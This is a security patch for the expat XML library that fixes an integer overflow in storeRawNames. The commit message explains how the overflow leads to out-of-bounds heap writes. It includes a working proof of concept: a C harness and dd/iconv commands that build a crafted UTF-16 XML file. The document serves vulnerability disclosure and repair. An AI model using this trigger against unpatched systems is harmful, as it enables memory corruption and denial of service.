|
|
4e0c08 |
From eb0362808b4f9f1e2345a0cf203b8cc196d776d9 Mon Sep 17 00:00:00 2001
|
|
|
4e0c08 |
From: Samanta Navarro <ferivoz@riseup.net>
|
|
|
4e0c08 |
Date: Tue, 15 Feb 2022 11:55:46 +0000
|
|
|
4e0c08 |
Subject: [PATCH] Prevent integer overflow in storeRawNames
|
|
|
4e0c08 |
|
|
|
4e0c08 |
It is possible to use an integer overflow in storeRawNames for out of
|
|
|
4e0c08 |
boundary heap writes. Default configuration is affected. If compiled
|
|
|
4e0c08 |
with XML_UNICODE then the attack does not work. Compiling with
|
|
|
4e0c08 |
-fsanitize=address confirms the following proof of concept.
|
|
|
4e0c08 |
|
|
|
4e0c08 |
The problem can be exploited by abusing the m_buffer expansion logic.
|
|
|
4e0c08 |
Even though the initial size of m_buffer is a power of two, eventually
|
|
|
4e0c08 |
it can end up a little bit lower, thus allowing allocations very close
|
|
|
4e0c08 |
to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
|
|
|
4e0c08 |
names can be parsed which are almost INT_MAX in size.
|
|
|
4e0c08 |
|
|
|
4e0c08 |
Unfortunately (from an attacker's point of view) INT_MAX/2 is also a
|
|
|
4e0c08 |
limitation in string pools. Having a tag name of INT_MAX/2 characters
|
|
|
4e0c08 |
or more is not possible.
|
|
|
4e0c08 |
|
|
|
4e0c08 |
Expat can convert between different encodings. UTF-16 documents which
|
|
|
4e0c08 |
contain only ASCII representable characters are twice as large as their
|
|
|
4e0c08 |
ASCII-encoded counterparts.
|
|
|
4e0c08 |
|
|
|
4e0c08 |
The proof of concept works by taking these three considerations into
|
|
|
4e0c08 |
account:
|
|
|
4e0c08 |
|
|
|
4e0c08 |
1. Move the m_buffer size slightly below a power of two by having a
|
|
|
4e0c08 |
short root node <a>. This allows the m_buffer to grow very close
|
|
|
4e0c08 |
to INT_MAX.
|
|
|
4e0c08 |
2. The string pooling forbids tag names longer than or equal to
|
|
|
4e0c08 |
INT_MAX/2, so keep the attack tag name smaller than that.
|
|
|
4e0c08 |
3. To be able to still overflow INT_MAX even though the name is
|
|
|
4e0c08 |
limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
|
|
|
4e0c08 |
which only contains ASCII characters. UTF-16 always stores two
|
|
|
4e0c08 |
bytes per character while the tag name is converted to using only
|
|
|
4e0c08 |
one. Our attack node byte count must be a bit higher than
|
|
|
4e0c08 |
2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
|
|
|
4e0c08 |
in sum can overflow INT_MAX.
|
|
|
4e0c08 |
|
|
|
4e0c08 |
Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
|
|
|
4e0c08 |
without running into INT_MAX boundary check. The string pooling is
|
|
|
4e0c08 |
able to store INT_MAX/3 as tag name because the amount is below
|
|
|
4e0c08 |
INT_MAX/2 limitation. And creating the sum of both eventually overflows
|
|
|
4e0c08 |
in storeRawNames.
|
|
|
4e0c08 |
|
|
|
4e0c08 |
Proof of Concept:
|
|
|
4e0c08 |
|
|
|
4e0c08 |
1. Compile expat with -fsanitize=address.
|
|
|
4e0c08 |
|
|
|
4e0c08 |
2. Create Proof of Concept binary which iterates through input
|
|
|
4e0c08 |
file 16 MB at once for better performance and easier integer
|
|
|
4e0c08 |
calculations:
|
|
|
4e0c08 |
|
|
|
4e0c08 |
```
|
|
|
4e0c08 |
cat > poc.c << EOF
|
|
|
4e0c08 |
#include <err.h>
|
|
|
4e0c08 |
#include <expat.h>
|
|
|
4e0c08 |
#include <stdlib.h>
|
|
|
4e0c08 |
#include <stdio.h>
|
|
|
4e0c08 |
|
|
|
4e0c08 |
#define CHUNK (16 * 1024 * 1024)
|
|
|
4e0c08 |
int main(int argc, char *argv[]) {
|
|
|
4e0c08 |
XML_Parser parser;
|
|
|
4e0c08 |
FILE *fp;
|
|
|
4e0c08 |
char *buf;
|
|
|
4e0c08 |
int i;
|
|
|
4e0c08 |
|
|
|
4e0c08 |
if (argc != 2)
|
|
|
4e0c08 |
errx(1, "usage: poc file.xml");
|
|
|
4e0c08 |
if ((parser = XML_ParserCreate(NULL)) == NULL)
|
|
|
4e0c08 |
errx(1, "failed to create expat parser");
|
|
|
4e0c08 |
if ((fp = fopen(argv[1], "r")) == NULL) {
|
|
|
4e0c08 |
XML_ParserFree(parser);
|
|
|
4e0c08 |
err(1, "failed to open file");
|
|
|
4e0c08 |
}
|
|
|
4e0c08 |
if ((buf = malloc(CHUNK)) == NULL) {
|
|
|
4e0c08 |
fclose(fp);
|
|
|
4e0c08 |
XML_ParserFree(parser);
|
|
|
4e0c08 |
err(1, "failed to allocate buffer");
|
|
|
4e0c08 |
}
|
|
|
4e0c08 |
i = 0;
|
|
|
4e0c08 |
while (fread(buf, CHUNK, 1, fp) == 1) {
|
|
|
4e0c08 |
printf("iteration %d: XML_Parse returns %d\n", ++i,
|
|
|
4e0c08 |
XML_Parse(parser, buf, CHUNK, XML_FALSE));
|
|
|
4e0c08 |
}
|
|
|
4e0c08 |
free(buf);
|
|
|
4e0c08 |
fclose(fp);
|
|
|
4e0c08 |
XML_ParserFree(parser);
|
|
|
4e0c08 |
return 0;
|
|
|
4e0c08 |
}
|
|
|
4e0c08 |
EOF
|
|
|
4e0c08 |
gcc -fsanitize=address -lexpat -o poc poc.c
|
|
|
4e0c08 |
```
|
|
|
4e0c08 |
|
|
|
4e0c08 |
3. Construct specially prepared UTF-16 XML file:
|
|
|
4e0c08 |
|
|
|
4e0c08 |
```
|
|
|
4e0c08 |
dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
|
|
|
4e0c08 |
echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
|
|
|
4e0c08 |
echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
|
|
|
4e0c08 |
iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
|
|
|
4e0c08 |
```
|
|
|
4e0c08 |
|
|
|
4e0c08 |
4. Run proof of concept:
|
|
|
4e0c08 |
|
|
|
4e0c08 |
```
|
|
|
4e0c08 |
./poc poc-utf16.xml
|
|
|
4e0c08 |
```
|
|
|
4e0c08 |
---
|
|
|
4e0c08 |
expat/lib/xmlparse.c | 7 ++++++-
|
|
|
4e0c08 |
1 file changed, 6 insertions(+), 1 deletion(-)
|
|
|
4e0c08 |
|
|
|
4e0c08 |
diff --git a/lib/xmlparse.c b/lib/xmlparse.c
|
|
|
4e0c08 |
index 4b43e613..f34d6ab5 100644
|
|
|
4e0c08 |
--- a/lib/xmlparse.c
|
|
|
4e0c08 |
+++ b/lib/xmlparse.c
|
|
|
4e0c08 |
@@ -2563,6 +2563,7 @@ storeRawNames(XML_Parser parser) {
|
|
|
4e0c08 |
while (tag) {
|
|
|
4e0c08 |
int bufSize;
|
|
|
4e0c08 |
int nameLen = sizeof(XML_Char) * (tag->name.strLen + 1);
|
|
|
4e0c08 |
+ size_t rawNameLen;
|
|
|
4e0c08 |
char *rawNameBuf = tag->buf + nameLen;
|
|
|
4e0c08 |
/* Stop if already stored. Since m_tagStack is a stack, we can stop
|
|
|
4e0c08 |
at the first entry that has already been copied; everything
|
|
|
4e0c08 |
@@ -2574,7 +2575,11 @@ storeRawNames(XML_Parser parser) {
|
|
|
4e0c08 |
/* For re-use purposes we need to ensure that the
|
|
|
4e0c08 |
size of tag->buf is a multiple of sizeof(XML_Char).
|
|
|
4e0c08 |
*/
|
|
|
4e0c08 |
- bufSize = nameLen + ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
|
|
|
4e0c08 |
+ rawNameLen = ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
|
|
|
4e0c08 |
+ /* Detect and prevent integer overflow. */
|
|
|
4e0c08 |
+ if (rawNameLen > (size_t)INT_MAX - nameLen)
|
|
|
4e0c08 |
+ return XML_FALSE;
|
|
|
4e0c08 |
+ bufSize = nameLen + (int)rawNameLen;
|
|
|
4e0c08 |
if (bufSize > tag->bufEnd - tag->buf) {
|
|
|
4e0c08 |
char *temp = (char *)REALLOC(parser, tag->buf, bufSize);
|
|
|
4e0c08 |
if (temp == NULL)
|
|
|
4e0c08 |
|